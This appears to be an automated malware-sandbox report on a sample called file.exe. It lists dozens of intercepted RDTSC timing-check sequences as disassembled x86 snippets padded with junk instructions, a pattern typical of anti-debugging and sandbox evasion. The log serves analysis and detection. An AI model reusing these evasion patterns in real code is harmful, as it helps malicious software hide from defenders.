Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 595671 second address: 595677 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59652C second address: 596593 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F40B515FBF8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push edi 0x0000002c call 00007F40B515FBF8h 0x00000031 pop edi 0x00000032 mov dword ptr [esp+04h], edi 0x00000036 add dword ptr [esp+04h], 00000014h 0x0000003e inc edi 0x0000003f push edi 0x00000040 ret 0x00000041 pop edi 0x00000042 ret 0x00000043 push 00000000h 0x00000045 mov di, 3F3Bh 0x00000049 xchg eax, esi 0x0000004a jnp 00007F40B515FC00h 0x00000050 pushad 0x00000051 jnp 00007F40B515FBF6h 0x00000057 push edi 0x00000058 pop edi 0x00000059 popad 0x0000005a push eax 0x0000005b push esi 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f popad 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59580C second address: 595812 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59851B second address: 598536 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FC07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5975E5 second address: 5975E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 598536 second address: 59853D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5975E9 second address: 5975EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59872C second address: 598732 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59B54A second address: 59B54F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59A835 second address: 59A839 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59B54F second address: 59B554 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59A839 second address: 59A843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59B554 second address: 59B55A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59A843 second address: 59A86A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FC00h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d jo 00007F40B515FBF6h 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 jl 00007F40B515FBF6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59B55A second address: 59B5A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a or bh, FFFFFFE7h 0x0000000d push 00000000h 0x0000000f mov bx, 606Dh 0x00000013 mov dword ptr [ebp+122D1CE3h], ebx 0x00000019 push 00000000h 0x0000001b jmp 00007F40B477E791h 0x00000020 xchg eax, esi 0x00000021 pushad 0x00000022 pushad 0x00000023 jmp 00007F40B477E797h 0x00000028 push edx 0x00000029 pop edx 0x0000002a popad 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e pop eax 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59B5A7 second address: 59B5CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FBFCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F40B515FBFCh 0x00000011 pushad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59D670 second address: 59D676 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59F62C second address: 59F6A4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F40B515FBF8h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 0000001Bh 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push edi 0x00000028 call 00007F40B515FBF8h 0x0000002d pop edi 0x0000002e mov dword ptr [esp+04h], edi 0x00000032 add dword ptr [esp+04h], 0000001Ch 0x0000003a inc edi 0x0000003b push edi 0x0000003c ret 0x0000003d pop edi 0x0000003e ret 0x0000003f push edi 0x00000040 add ebx, 23DBC9B8h 0x00000046 pop ebx 0x00000047 push 00000000h 0x00000049 add dword ptr [ebp+122D1D79h], edi 0x0000004f jng 00007F40B515FBFCh 0x00000055 xchg eax, esi 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 jo 00007F40B515FBF6h 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59F6A4 second address: 59F6A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59E794 second address: 59E7AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FC05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A0733 second address: 5A073E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F40B477E786h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A184A second address: 5A1850 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A1850 second address: 5A18B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E78Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov ebx, dword ptr [ebp+124828B6h] 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 jmp 00007F40B477E792h 0x0000001a pop edi 0x0000001b push 00000000h 0x0000001d jmp 00007F40B477E78Ch 0x00000022 xchg eax, esi 0x00000023 push ebx 0x00000024 jo 00007F40B477E798h 0x0000002a jmp 00007F40B477E792h 0x0000002f pop ebx 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F40B477E78Ch 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A2C08 second address: 5A2C1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F40B515FBF6h 0x0000000a popad 0x0000000b pop ebx 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A75B0 second address: 5A75B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5ABF65 second address: 5ABF6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F40B515FBF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B2011 second address: 5B2032 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E794h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c pushad 0x0000000d push ecx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B2032 second address: 5B2057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F40B515FC06h 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e jnl 00007F40B515FBF6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 550B55 second address: 550B6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F40B477E791h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B4177 second address: 5B417C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B8A49 second address: 5B8A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F40B477E786h 0x0000000a jne 00007F40B477E786h 0x00000010 popad 0x00000011 jnc 00007F40B477E78Eh 0x00000017 pop ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 jns 00007F40B477E788h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B9295 second address: 5B929C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B9545 second address: 5B954F instructions: 0x00000000 rdtsc 0x00000002 jne 00007F40B477E792h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B954F second address: 5B9575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F40B515FBF6h 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d jmp 00007F40B515FBFDh 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 jc 00007F40B515FC14h 0x0000001b push ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B96FD second address: 5B9707 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B9707 second address: 5B971D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jo 00007F40B515FBF8h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pushad 0x00000010 push esi 0x00000011 pop esi 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B99D5 second address: 5B99DF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F40B477E786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B9B4C second address: 5B9B77 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F40B515FC07h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnc 00007F40B515FBF8h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B9B77 second address: 5B9B7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B9B7B second address: 5B9B7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B9B7F second address: 5B9B97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F40B477E786h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jbe 00007F40B477E78Ch 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B9B97 second address: 5B9BA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jng 00007F40B515FBF6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B9BA3 second address: 5B9BA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5BDECA second address: 5BDED2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5BDED2 second address: 5BDEE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007F40B477E786h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007F40B477E78Eh 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5BE068 second address: 5BE06E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5BE06E second address: 5BE07A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F40B477E78Eh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5BE07A second address: 5BE0B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F40B515FC01h 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007F40B515FBFBh 0x00000013 jbe 00007F40B515FBF6h 0x00000019 popad 0x0000001a jmp 00007F40B515FBFFh 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5BE0B8 second address: 5BE0CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jnp 00007F40B477E786h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5BE0CA second address: 5BE0D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5BE217 second address: 5BE223 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F40B477E786h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5BE987 second address: 5BE993 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F40B515FBF6h 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56E9B6 second address: 56E9BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56E9BB second address: 56E9CD instructions: 0x00000000 rdtsc 0x00000002 jo 00007F40B515FBF8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56E9CD second address: 56E9D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56E9D3 second address: 56E9D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56E9D7 second address: 56E9E3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 js 00007F40B477E786h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5BF418 second address: 5BF438 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 jns 00007F40B515FBF6h 0x0000000d push eax 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 jmp 00007F40B515FBFCh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C3B7A second address: 5C3B97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F40B477E795h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C3CBD second address: 5C3CC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C3DFC second address: 5C3E10 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F40B477E786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007F40B477E786h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C3E10 second address: 5C3E14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C3E14 second address: 5C3E1E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F40B477E786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C42EB second address: 5C42F7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C3865 second address: 5C3869 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C3869 second address: 5C3875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C3875 second address: 5C387F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F40B477E786h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C387F second address: 5C3885 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C4AD4 second address: 5C4ADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C4ADA second address: 5C4AF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F40B515FC07h 0x0000000a jmp 00007F40B515FBFBh 0x0000000f jnl 00007F40B515FBF6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58FE23 second address: 58FE32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F40B477E78Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58FE32 second address: 56DF43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007F40B515FBF8h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 add dword ptr [ebp+124567D7h], ebx 0x0000002b lea eax, dword ptr [ebp+12484B49h] 0x00000031 mov dword ptr [ebp+122D3709h], ebx 0x00000037 nop 0x00000038 ja 00007F40B515FC10h 0x0000003e push eax 0x0000003f jns 00007F40B515FC04h 0x00000045 nop 0x00000046 mov dword ptr [ebp+1244F1DBh], edi 0x0000004c call dword ptr [ebp+122D1F3Ah] 0x00000052 push eax 0x00000053 push ebx 0x00000054 jne 00007F40B515FBF6h 0x0000005a pop ebx 0x0000005b push esi 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58FFD0 second address: 58FFD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5904EF second address: 5904F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5904F3 second address: 5904F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59064B second address: 590651 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 590651 second address: 590657 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 590657 second address: 59065B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5907C3 second address: 5907C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 590A43 second address: 590A55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007F40B515FBFCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 590A55 second address: 590A59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 591282 second address: 5912A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FC07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5912A4 second address: 5912C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E798h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5912C0 second address: 56E9B6 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F40B515FBF8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov cx, A2ACh 0x0000000f call dword ptr [ebp+122D1EF3h] 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 jnl 00007F40B515FBF6h 0x0000001e jmp 00007F40B515FC06h 0x00000023 jl 00007F40B515FBF6h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C9659 second address: 5C966B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007F40B477E786h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C966B second address: 5C9680 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F40B515FBF6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d js 00007F40B515FBF6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
